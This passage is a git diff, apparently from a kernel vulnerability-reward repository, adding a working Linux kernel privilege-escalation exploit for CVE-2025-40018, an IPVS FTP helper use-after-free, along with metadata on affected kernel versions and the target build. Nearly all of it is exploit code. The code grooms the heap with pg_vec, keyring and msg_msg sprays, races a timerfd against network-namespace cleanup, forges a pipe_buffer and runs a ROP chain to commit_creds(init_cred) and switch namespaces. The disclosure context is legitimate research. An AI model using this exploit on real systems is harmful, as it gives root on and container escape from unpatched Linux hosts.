+ * Victim object: ip_vs_app (kmalloc-256), allocated by unshare(CLONE_NEW_NET)
+ * But unshare(CLONE_NEW_NET) allocates many objects in kmalloc-256 in a row:
+ * (20 objs) (victim obj) (40+ objs), victim obj is the 21th
+ */
+#define VICTIM_ALLOC_POSITION 21
+#define KMALLOC_256_OBJS_PER_SLAB 16
+// We choose SLOTS_PER_SLAB=8 based on experiment
+#define SLOTS_PER_SLAB 8
+#define DIV_ROUND_UP(n, d) (((n) + (d) - 1) / (d))
+#define SPRAY_SLABS (DIV_ROUND_UP(VICTIM_ALLOC_POSITION, SLOTS_PER_SLAB))
+#define PACKET_SPRAY_CNT (KMALLOC_256_OBJS_PER_SLAB * SPRAY_SLABS)
+
+int packet_fds[PACKET_SPRAY_CNT];
+// After spraying kmalloc-256 pg_vec and freeing some pg_vec to create slots,
+// the victim obj allocated later has high chance to locates in the slots.
+static void spray_pg_vec_and_create_slots() {
+    memset(packet_fds, 0, sizeof(packet_fds));
+    for (int i = 0; i < PACKET_SPRAY_CNT; i++) {
+        packet_fds[i] = alloc_kmalloc_256_pg_vec();
+        if (packet_fds[i] < 0) die("alloc_kmalloc_256_pg_vec");
+    }
+    for (int i = 0; i < PACKET_SPRAY_CNT; i += KMALLOC_256_OBJS_PER_SLAB) {
+        for (int j = 0; j < SLOTS_PER_SLAB; j++) {
+            close(packet_fds[i + j]);
+            packet_fds[i + j] = -1;
+        }
+    }
+}
+
+/* CPU #0: netns cleanup kthread (free-and-then-use) / CPU #1: spray thread
+ * After unshare(CLONE_NEW_NET), the slab that the victim is on becomes full.
+ * When a full slab becomes partial, it will be put in the current CPU's
+ * partial list. 
+ * We should do full-->partial transition for the slab on CPU #1 in 
+ * advance for cross-cpu allocation. 
+ * If not, the slab's full-->partial transition will happen in kthread on 
+ * CPU #0, and it will be put in CPU #0's partial list. We will be unable 
+ * to reclaim the victim from spray thread on CPU #1. 
+ * Since the victim locates in the slots with pg_vec on the same slab, 
+ * free some pg_vec(1 per slab) on CPU #1 to make the slab full-->partial.
+ */
+static void freeze_victim_slab() {
+    for (int i = 0; i < PACKET_SPRAY_CNT; i += KMALLOC_256_OBJS_PER_SLAB) {
+        close(packet_fds[i + SLOTS_PER_SLAB]);
+        packet_fds[i + SLOTS_PER_SLAB] = -1;
+    }
+}
+
+static void clean_up_pg_vec() {
+    for (int i = 0; i < PACKET_SPRAY_CNT; i++) {
+        if (packet_fds[i] < 0) continue;
+        close(packet_fds[i]);
+        packet_fds[i] = -1;
+    }
+}
+
+// =-=-=-=-=-=-=-= KEYRING HELPERS =-=-=-=-=-=-=-=
+// We use user_key_payload as spray kmalloc-256 object to occupy freed 
+// victim obj and rewrite app->module to arbitrary address, to get 
+// arbitrary address decrement primitive by module_put(app->module).
+#define USER_KEY_PAYLOAD_SZ 24
+#define KEY_PAYLOAD_SIZE (KMALLOC256_SIZE - USER_KEY_PAYLOAD_SZ)
+#define KEY_SPRAY_NUM 40
+
+typedef int32_t key_serial_t;
+
+static inline key_serial_t add_key(const char *type, const char *description, 
+        const void *payload, size_t plen, key_serial_t ringid) {
+    return syscall(__NR_add_key, type, description, payload, plen, ringid);
+}
+
+static inline key_serial_t key_revoke(key_serial_t keyid)
+{
+    return syscall(__NR_keyctl, KEYCTL_REVOKE, keyid, 0, 0, 0);
+}
+
+char key_desc[KMALLOC256_SIZE];
+char key_payload[KEY_PAYLOAD_SIZE + 1];
+key_serial_t id_buffer[KEY_SPRAY_NUM];
+
+static inline void spray_userkey() {
+    for (uint32_t i = 0; i < KEY_SPRAY_NUM; i++) {
+        snprintf(key_desc, KMALLOC256_SIZE, "SPRAY-RING-%03du", i);
+        id_buffer[i] = add_key("user", key_desc, key_payload, 
+                        KEY_PAYLOAD_SIZE, KEY_SPEC_PROCESS_KEYRING);
+        if (id_buffer[i] < 0) die("add_key %d", i);
+    }
+}
+
+static inline void cleanup_userkey() {
+    for (uint32_t i = 0; i < KEY_SPRAY_NUM; i++) {
+        if (key_revoke(id_buffer[i]) < 0) die("key_revoke");
+    }
+}
+
+// =-=-=-=-=-=-=-= PIPE_BUFFER HELPERS =-=-=-=-=-=-=-=
+#define PIPE_BUFFER_SPRAY_NUM 0x100
+int pipe_fds[PIPE_BUFFER_SPRAY_NUM][2];
+
+static inline void spray_pipe_buffer() {
+    for (int i = 0; i < PIPE_BUFFER_SPRAY_NUM; i++) {
+        pipe(pipe_fds[i]);
+    }
+}
+
+// =-=-=-=-=-=-=-= MSG_MSG HELPERS =-=-=-=-=-=-=-=
+#define MSG_SPRAY_NUM_PER_PROCESS 32000 // maximal num of msg_msg queues per ipc ns
+#define MSG_SECOND_SPRAY_NUM 2000
+#define MSG_FIRST_SPRAY_NUM (MSG_SPRAY_NUM_PER_PROCESS - MSG_SECOND_SPRAY_NUM)
+#define KMALLOC_CG_4K_SZ 0x1000
+#define MSG_MSG_SZ 0x30
+#define MSG_MSG_DATA_SZ (KMALLOC_CG_4K_SZ - MSG_MSG_SZ)
+#define KMALLOC_CG_1K_SZ 0x400 
+#define MSG_MSGSEG_SZ 8
+#define MSG_MSGSEG_DATA_SZ (KMALLOC_CG_1K_SZ - MSG_MSGSEG_SZ)
+#define MSGBUF_SZ (MSG_MSG_DATA_SZ + MSG_MSGSEG_DATA_SZ)
+#define SPRAY_PROCESS_NUM 12 
+
+// After spraying 1.37 GB msg_msg, the msg_msg has 
+// high probability to be allocated at leak_kheap_base + GUESSED_OFFSET
+#define GUESSED_OFFSET 0xa000000
+#define GUESSED_MSG_ADDR (leak_kheap_base + GUESSED_OFFSET)
+#define MAGIC_MARKER 0xdeadbeef
+
+struct msg_buf {
+    uint64_t mtype;
+    char mtext[MSGBUF_SZ];
+};
+int *msg_queues;
+int *hit;
+
+// For 3.5 GB RAM system, we spray MSG_FIRST_SPRAY_NUM * SPRAY_PROCESS_NUM 
+// * KMALLOC_CG_4K_SZ = 1.37 GB msg_msg
+void spray_msg(int process_idx) {
+    struct msg_buf msgbuf;
+    uint64_t msg_idx;
+    logd("Creating message queue...");
+    for (int i = 0; i < MSG_SPRAY_NUM_PER_PROCESS; i++) {
+        msg_idx = process_idx*MSG_SPRAY_NUM_PER_PROCESS + i;
+        msg_queues[msg_idx] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
+        if (msg_queues[msg_idx] < 0)
+            loge("Failed to get message queue");
+    }
+    
+    memset(&msgbuf, 0, sizeof(msgbuf));
+    for (int i = 0; i < MSG_FIRST_SPRAY_NUM; i++) {
+        msg_idx = process_idx * MSG_SPRAY_NUM_PER_PROCESS + i;
+        msgbuf.mtype = msg_idx + 1;
+        char *msg_msgseg_data = &msgbuf.mtext[MSG_MSG_DATA_SZ];
+        // Identification for each msg_msgseg
+        *(uint64_t *)(msg_msgseg_data) = msg_idx; 
+        // MAGIC_MARKER is the oracle of an partial overlap of msg_msgseg
+        *(uint64_t *)(msg_msgseg_data + 0x100) = MAGIC_MARKER;
+        *(uint64_t *)(msg_msgseg_data + 0x200) = MAGIC_MARKER;
+        *(uint64_t *)(msg_msgseg_data + 0x300) = MAGIC_MARKER;
+        if (msgsnd(msg_queues[msg_idx], &msgbuf, MSGBUF_SZ, 0) < 0)
+            loge("Failed to send message");
+    }
+}
+
+// Peek every msg_msgseg after a race try. If succeed, fix the timerfd 
+// timeout count, keep triggering the race to modify the target msg_msg->next 
+// until it points to another msg_msgseg. Then perform post exploit.
+void peek_msg(int process_idx) {
+    struct msg_buf msgbuf;
+    uint64_t msg_idx, victim_idx, target_idx;
+    for (int i = 0; i < MSG_FIRST_SPRAY_NUM; i++) {
+        msg_idx = process_idx*MSG_SPRAY_NUM_PER_PROCESS + i;
+        memset(&msgbuf, 0, sizeof(msgbuf));
+        if (msgrcv(msg_queues[msg_idx], &msgbuf, MSGBUF_SZ,
+                 0, MSG_COPY | IPC_NOWAIT | MSG_NOERROR) < 0)            
+            loge("Failed to receive message");
+        
+        target_idx = *(uint64_t *)(&msgbuf.mtext[MSG_MSG_DATA_SZ]);
+        // No overlap, continue
+        if (target_idx == msg_idx) continue;
+
+        // Partial overlap of msg_msgseg detected, race succeed
+        if (!*hit) { logs("hit"); *hit = 1; }
+        // Keep triggering the race to modify the target msg_msg->next 
+        // Until it points to another msg_msgseg.
+        if (target_idx == 0xdeadbeef) continue;
+
+        // Now we have 2 fully overlapped msg_msgseg, do post exploit
+        victim_idx = msg_idx;
+        bind_to_cpu(1);
+        logs("victim: 0x%lx now overlap with target: 0x%lx", victim_idx, target_idx);
+        logi("free victim msg_msgseg");
+        if (msgrcv(msg_queues[victim_idx], &msgbuf, MSGBUF_SZ,
+                 victim_idx + 1, IPC_NOWAIT | MSG_NOERROR) < 0)
+            loge("Failed to receive message");
+        spray_pipe_buffer();
+        logi("free target msg_msgseg");
+        if (msgrcv(msg_queues[target_idx], &msgbuf, MSGBUF_SZ,
+                 target_idx + 1, IPC_NOWAIT | MSG_NOERROR) < 0)
+            loge("Failed to receive message");
+        
+        memset(&msgbuf, 0, sizeof(msgbuf));
+        #define PIPE_BUFFET_OFFS_OPS 0x10 // pipe_buffer->ops offset
+        #define PIPE_BUF_OPS_OFFS_RELEASE 0x08 // pipe_buf_operations->release offset
+        char *msg_msg_data = &msgbuf.mtext[0x0];
+        char *msg_msg = msg_msg_data - MSG_MSG_SZ;
+        char *msg_msgseg_data = &msgbuf.mtext[MSG_MSG_DATA_SZ];
+        char *msg_msgseg = msg_msgseg_data - MSG_MSGSEG_SZ;
+        char *fake_pipe_buffer = msg_msgseg;
+
+        *(uint64_t *)&fake_pipe_buffer[PIPE_BUFFET_OFFS_OPS] = GUESSED_MSG_ADDR + 0x100; // fake_ops
+        char *fake_ops = msg_msg + 0x100;
+        *(uint64_t *)&fake_ops[PIPE_BUF_OPS_OFFS_RELEASE] = 
+        PUSH_RSI_JMP_QWORD_PTR_RSI_0X39 + kernel_offset; // pivot gadget
+        *(uint64_t *)(fake_pipe_buffer + 0x39) = POP_RSP_POP_R15_RET + kernel_offset; // pivot gadget
+        
+        // push rsi ; pop rsp ; pop r15 ; --> rsp == rsi + 8
+        uint64_t *rop = (uint64_t *)(fake_pipe_buffer + 8);
+        int i = 0;
+        rop[i++] = POP_RDI_RET + kernel_offset; // slide gadget
+        i+=1; // Avoid corrupting fake_pipe_buffer[PIPE_BUFFET_OFFS_OPS]
+        rop[i++] = POP_RDI_RET + kernel_offset;
+        rop[i++] = INIT_CRED + kernel_offset;
+        rop[i++] = POP_R12_POP_RBP_POP_RBX_RET + kernel_offset; // slide gadget
+        i+=3; // Avoid corrupting fake_pipe_buffer + 0x39
+        rop[i++] = COMMIT_CREDS + kernel_offset;
+
+        rop[i++] = POP_RDI_RET + kernel_offset;
+        rop[i++] = 1;
+        rop[i++] = FIND_TASK_BY_VPID + kernel_offset;
+            
+        rop[i++] = POP_RSI_RET + kernel_offset;
+        rop[i++] = GUESSED_MSG_ADDR + 0x200 + 0x7f;
+        rop[i++] = PUSH_RAX_JMP_QWORD_PTR_RSI_MINUS_0x7f + kernel_offset;
+        *(uint64_t *)(&msg_msg[0x200]) = POP_RDI_RET + kernel_offset;
+        rop[i++] = POP_RSI_RET + kernel_offset;
+        rop[i++] = INIT_NSPROXY + kernel_offset;
+        rop[i++] = SWITCH_TASK_NAMESPACES + kernel_offset;
+
+        rop[i++] = RET2USERMODE + kernel_offset;
+        rop[i++] = 0;
+        rop[i++] = 0;
+        rsp &= ~0xf;
+        rsp += 8;
+        rop[i++] = (uint64_t)win;
+        rop[i++] = cs;
+        rop[i++] = rflags;
+        rop[i++] = rsp;
+        rop[i++] = ss;
+
+        // Spray msg_msgseg to rewrite pipe_buffer
+        for (int i = MSG_FIRST_SPRAY_NUM; i < MSG_SPRAY_NUM_PER_PROCESS; i++) {
+            msg_idx = process_idx * MSG_SPRAY_NUM_PER_PROCESS + i;
+            msgbuf.mtype = msg_idx + 1;
+            if (msgsnd(msg_queues[msg_idx], &msgbuf, MSGBUF_SZ, 0) < 0)
+                loge("Failed to send message");
+        }
+        // Trigger pipe_buffer->ops->release(), rop
+        for (int i = 0; i < PIPE_BUFFER_SPRAY_NUM; i++) {
+            close(pipe_fds[i][0]);
+            close(pipe_fds[i][1]);
+        }
+        sleep(1);
+        loge("exploit failed");
+    }
+}
+
+// =-=-=-=-=-=-=-= MAIN =-=-=-=-=-=-=-=
+struct ip_vs_svcdest_user {
+    struct ip_vs_service_user svc;
+    struct ip_vs_dest_user dest;
+} __attribute__((packed));
+
+int pipe_fd[2][2];
+
+int setup_ipvs() {
+    bring_interface_up("lo");
+
+    int tcp_fd = socket(AF_INET, SOCK_STREAM, 0);
+    if (tcp_fd < 0) die("Failed to create TCP socket");
+    
+    // Add ipvs service
+    struct ip_vs_service_user ip_vs_service;
+    memset(&ip_vs_service, 0, sizeof(ip_vs_service));
+    ip_vs_service.protocol = IPPROTO_TCP;
+    ip_vs_service.addr = inet_addr("127.0.0.1");
+    ip_vs_service.port = htons(21); // Set to FTP's port
+    ip_vs_service.timeout = 30 * 60;
+    memcpy(ip_vs_service.sched_name, "rr", 3);
+    setsockopt(tcp_fd, SOL_IP, IP_VS_SO_SET_ADD, &ip_vs_service, sizeof(ip_vs_service));
+    
+    // Add ipvs destination
+    struct ip_vs_svcdest_user ip_vs_svcdest;
+    memset(&ip_vs_svcdest, 0, sizeof(ip_vs_svcdest));
+    memcpy(&ip_vs_svcdest.svc, &ip_vs_service, sizeof(ip_vs_service));
+    ip_vs_svcdest.dest.addr = inet_addr("127.0.0.1");
+    ip_vs_svcdest.dest.port = htons(1337);
+    ip_vs_svcdest.dest.conn_flags = IP_VS_CONN_F_MASQ;
+    ip_vs_svcdest.dest.weight = 1;
+    ip_vs_svcdest.dest.u_threshold = 0;
+    ip_vs_svcdest.dest.l_threshold = 0;
+    setsockopt(tcp_fd, SOL_IP, IP_VS_SO_SET_ADDDEST, &ip_vs_svcdest, sizeof(ip_vs_svcdest));
+    
+    // Create FTP connection
+    struct sockaddr_in backend_addr;
+    memset(&backend_addr, 0, sizeof(backend_addr));
+    backend_addr.sin_family = AF_INET;
+    backend_addr.sin_port = htons(1337);
+    backend_addr.sin_addr.s_addr = inet_addr("127.0.0.1");
+
+    int recv_fd = socket(AF_INET, SOCK_STREAM, 0);
+    if (recv_fd < 0) die("socket");
+    if (bind(recv_fd, (struct sockaddr *)&backend_addr, sizeof(backend_addr)) < 0)
+        die("bind");
+    if (listen(recv_fd, 5) < 0) die("listen");
+    struct sockaddr_in service_addr;
+    memset(&service_addr, 0, sizeof(service_addr));
+    service_addr.sin_family = AF_INET;
+    service_addr.sin_port = htons(21);
+    service_addr.sin_addr.s_addr = inet_addr("127.0.0.1");
+    if (connect(tcp_fd, (struct sockaddr *)&service_addr, sizeof(service_addr)) < 0)
+        die("connect");
+    const char *msg = "AAAA";
+    // Sendmsg to new ip_vs_conn, with cp->app->app == victim
+    if (send(tcp_fd, msg, strlen(msg)+1, 0) < 0)
+        die("send");
+    close(tcp_fd);
+    close(recv_fd);
+}
+
+static void *busy_waiting(void *arg) {
+    uint64_t core = (uint64_t )arg;
+    bind_to_cpu(core);
+    while(1);
+}
+
+static inline void set_dec_addr(uint64_t target) {
+    char *user_key_payload = key_payload - USER_KEY_PAYLOAD_SZ;
+    char *fake_ip_vs_app = user_key_payload;
+    #define IP_VS_APP_OFFSETS_MODULE 40 // ip_vs_app->module offsets
+    #define MODULE_OFFSETS_REFCNT 832   // module->refcnt offsets
+    *(uint64_t *)&fake_ip_vs_app[IP_VS_APP_OFFSETS_MODULE] = target - MODULE_OFFSETS_REFCNT;
+}
+
+void *spray_job(void *arg) {
+    char signal;
+    bind_to_cpu(1);
+    while (1) {
+        barrier(&barr);
+
+        struct timespec ts = {.tv_nsec = count };
+        nanosleep(&ts, NULL);
+        spray_userkey();
+        barrier(&barr);
+
+        cleanup_userkey();
+        barrier(&barr);
+    }
+}
+
+typedef struct {
+    sem_t child_sem;
+    sem_t parent_sem;
+} shared_sems;
+
+int main(int argc, char *argv[]) {
+    save_status();
+    // EntryBleed
+    leak();
+
+    // Initialize shared data
+    shared_sems *shared = mmap(NULL, sizeof(shared_sems), PROT_READ | PROT_WRITE,
+                                 MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+    if (shared == MAP_FAILED) die("mmap");
+    if (sem_init(&shared->child_sem, 1, 0) < 0) die("sem_init");
+    if (sem_init(&shared->parent_sem, 1, 0) < 0) die("sem_init");
+
+    hit = mmap(NULL, sizeof(int), PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+    if (hit == MAP_FAILED) die("mmap");
+
+    msg_queues = mmap(NULL, sizeof(int)*MSG_SPRAY_NUM_PER_PROCESS*SPRAY_PROCESS_NUM, 
+                        PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+    if (msg_queues == MAP_FAILED) die("mmap");
+
+    // Fork childs for spraying msg_msg
+    int pid[SPRAY_PROCESS_NUM];
+    for (int i = 0; i < SPRAY_PROCESS_NUM; i++) {
+        pid[i] = fork();
+        if (!pid[i]) {
+            setup_namespace();
+            bind_to_cpu(1);
+            spray_msg(i);
+            while(1) {
+                sem_post(&shared->child_sem);
+                sched_yield();
+                sem_wait(&shared->parent_sem);
+                peek_msg(i);
+            }
+        }
+    }
+
+    setup_namespace();
+    struct rlimit rlim = { .rlim_cur = 0xf000, .rlim_max = 0xf000 };
+	setrlimit(RLIMIT_NOFILE, &rlim);
+
+    // Use infinite loop threads to occupy CPUs except #0, increase the  
+    // possibility that kernel schedules net_cleanup_work to CPU #0
+    #define BUSY_WAITING_THREADS 1
+    ncpus = sysconf(_SC_NPROCESSORS_CONF);
+    pthread_t tid[ncpus][BUSY_WAITING_THREADS];
+    uint64_t args[ncpus];
+    for (int i = 1; i < ncpus; i++) {
+        args[i] = i;
+        for (int j = 0; j < BUSY_WAITING_THREADS; j++) {
+            pthread_create(&tid[i][j], 0, busy_waiting, (void *)args[i]);
+        }
+    }
+
+    tfd = SYSCHK(timerfd_create(CLOCK_MONOTONIC, 0));
+	do_epoll_enqueue(tfd, 17);
+
+    char signal;
+    pipe(pipe_fd[0]);
+    pipe(pipe_fd[1]);
+
+    bind_to_cpu(1);
+    pthread_barrier_init(&barr, NULL, 2);
+    pthread_t tid_spray_userkey;
+    pthread_create(&tid_spray_userkey, 0, spray_job, NULL);
+
+    // The count to hit the race window, depends on CPU.
+    // The range is chosen based on experiment for Github Action environment.
+    #define TIMERFD_COUNT_START 35645000
+    #define TIMERFD_COUNT_END 35733000
+    count = TIMERFD_COUNT_START;
+    // Boost next round try in PR verification workflow after 6 mins
+    alarm(360);
+    while (1) {
+        for (int i = 0; i < SPRAY_PROCESS_NUM; i++) {
+            sem_wait(&shared->child_sem);
+        }
+
+        struct itimerspec new = { .it_value.tv_nsec = count };
+        logd("count:%010d", count);
+        if (!(*hit)) {
+            count += 1000;
+            if (count > TIMERFD_COUNT_END) 
+                count = TIMERFD_COUNT_START;
+        }
+
+        #define MSG_MSG_NEXT_OFFSET 0x20 // msg_msg->next offset
+        set_dec_addr(GUESSED_MSG_ADDR + MSG_MSG_NEXT_OFFSET + 1);
+        // Set *(msg_msg->next + 1) -= 1 by arbitrary decrement primitive,
+        // so msg_msg->next -= 0x100;
+            
+        if (!fork()) {
+            bind_to_cpu(1);
+
+            write(pipe_fd[0][1], &signal, 1);
+            read(pipe_fd[1][0], &signal, 1);
+            // victim ip_vs_app (ip_vs_ftp) is allocated here
+            if (unshare(CLONE_NEWNET)) die("unshare(CLONE_NEWNET)");
+            
+            write(pipe_fd[0][1], &signal, 1);
+            read(pipe_fd[1][0], &signal, 1);
+            // Switch CPU to reduce noise
+            bind_to_cpu(0);
+            setup_ipvs();
+            bind_to_cpu(1);
+
+            write(pipe_fd[0][1], &signal, 1);
+            read(pipe_fd[1][0], &signal, 1);
+            return 0;   // Schedule net_cleanup_work
+        }
+        
+        read(pipe_fd[0][0], &signal, 1);
+        spray_pg_vec_and_create_slots();
+        write(pipe_fd[1][1], &signal, 1);
+        // Child: unshare(CLONE_NEWNET) to allocate victim
+        read(pipe_fd[0][0], &signal, 1);
+        freeze_victim_slab();
+        write(pipe_fd[1][1], &signal, 1);
+
+        read(pipe_fd[0][0], &signal, 1);
+        // Set timer on CPU #0 and start racing
+        bind_to_cpu(0);
+        timerfd_settime(tfd, TFD_TIMER_CANCEL_ON_SET, &new, NULL);
+        bind_to_cpu(1);
+        write(pipe_fd[1][1], &signal, 1);
+        barrier(&barr);
+        
+        usleep(100000); // Wait for ns cleanup to finish
+        barrier(&barr);
+        
+        clean_up_pg_vec();
+        barrier(&barr);
+
+        for (int i = 0; i < SPRAY_PROCESS_NUM; i++)
+            sem_post(&shared->parent_sem); // notice childs to check if race succeed
+    }
+
+    return 0;
+}
\ No newline at end of file
diff --git a/pocs/linux/kernelctf/CVE-2025-40018_cos/metadata.json b/pocs/linux/kernelctf/CVE-2025-40018_cos/metadata.json
new file mode 100644
index 000000000..276a114e9
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2025-40018_cos/metadata.json
@@ -0,0 +1,26 @@
+{
+    "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json",
+    "submission_ids": ["exp416"],
+    "vulnerability": {
+        "summary": "IPVS FTP helper Use-After-Free during network namespace cleanup",
+        "cve": "CVE-2025-40018",
+        "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=134121bfd99a06d44ef5ba15a9beb075297c0821",
+        "affected_versions": ["2.6.39 - 6.18"],
+        "requirements": {
+            "attack_surface": ["userns"],
+            "capabilities": ["CAP_NET_ADMIN"],
+            "kernel_config": [
+                "CONFIG_NETFILTER",
+                "CONFIG_IP_VS",
+                "CONFIG_IP_VS_FTP"
+            ]
+        }
+    },
+    "exploits":{
+        "cos-113-18244.448.33": {
+            "uses": ["userns"],
+            "requires_separate_kaslr_leak": false,
+            "stability_notes": "3 ~ 4 times success per 10 times run"
+        }
+    }
+}
\ No newline at end of file
diff --git a/pocs/linux/kernelctf/CVE-2025-40018_cos/original.tar.gz b/pocs/linux/kernelctf/CVE-2025-40018_cos/original.tar.gz
new file mode 100755
index 000000000..d06d359cc
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-40018_cos/original.tar.gz differ